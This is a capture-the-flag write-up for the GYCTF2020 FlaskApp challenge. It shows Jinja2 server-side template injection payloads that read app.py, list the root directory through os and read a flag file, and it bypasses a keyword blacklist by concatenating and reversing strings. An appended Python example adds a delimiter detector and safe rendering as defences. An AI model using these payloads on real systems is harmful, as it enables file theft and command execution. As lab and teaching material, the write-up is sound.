[GYCTF2020]FlaskApp
Open the site.
There is no SQL injection here.
Entering 123 triggers an error,
and the error page leaks part of the source code.
The line `if waf(tmp)` shows there is a WAF.
SSTI (server-side template injection) can be used.
On the encryption page, encrypt
{{4+5}}
which gives
e3s0KzV9fQ==
Then submit it to the decryption page to check whether SSTI works.
The result shows 9, so the injection succeeded.
Try config.
payload: {{config}}
Try reading the source code:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}
def waf(str):
    black_list = ["flag","os","system","popen","import","eval","chr","request",
                  "subprocess","commands","socket","hex","base64","*","?"]
    for x in black_list :
        if x in str.lower() :
            return 1
The blacklist is a plain substring check, so string concatenation bypasses it:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
The directory listing contains a file named this_is_the_flag.
Reading the file can also bypass the check with string concatenation:
{% for c in [].__class__.__base__.__subclasses__() %}{%if c.__name__=='catch_warnings' %}{{c.__init__.__globals__['__builtins__'].open('/this_is_the_f'+'lag.txt','r').read()}}{% endif %}{% endfor %}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}
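As an added example (not part of this writeup), the leaked blacklist sits beside two defensive measures: a delimiter-based detector that the concatenation trick does not evade, and the structural fix of binding user input to a template variable instead of compiling it as template source. Jinja2 is assumed to be installed; the sample inputs are constructed from the payloads above.

```python
import re

# Blacklist copied from the leaked app.py above; everything else in this
# block is an added example, not the challenge's own code.
BLACK_LIST = ["flag", "os", "system", "popen", "import", "eval", "chr", "request",
              "subprocess", "commands", "socket", "hex", "base64", "*", "?"]


def waf(s):
    """The challenge's check: a hit only when a listed word appears literally."""
    return any(x in s.lower() for x in BLACK_LIST)


def uses_template_syntax(s):
    """Keyword-independent detection: any Jinja delimiter inside text that
    came from the user is itself the thing to alert on."""
    return re.search(r"\{\{|\{%|\{#", s) is not None


def render_as_data(user_input):
    """Structural fix: the template is a constant and the input is bound to a
    variable, so delimiters inside it are printed, never evaluated.
    Assumes Jinja2 (Flask's template engine) is installed."""
    from jinja2 import Environment, select_autoescape
    env = Environment(autoescape=select_autoescape(default=True))
    return env.from_string("{{ text }}").render(text=user_input)


# Constructed inputs: the writeup's probe, its concatenated bypass payload,
# and the same payload with the blocked words left intact.
PROBE = "{{4+5}}"
BYPASS = ("{% for c in [].__class__.__base__.__subclasses__() %}"
          "{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__"
          "['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}"
          "{% endif %}{% endfor %}")
DIRECT = BYPASS.replace("['__imp'+'ort__']('o'+'s')", "['__import__']('os')")

if __name__ == "__main__":
    for label, s in [("probe", PROBE), ("bypass", BYPASS), ("direct", DIRECT)]:
        print(label, "| blacklist hit:", waf(s),
              "| template syntax:", uses_template_syntax(s))
    # The probe is echoed literally as {{4+5}} instead of evaluating to 9.
    print(render_as_data(PROBE))
```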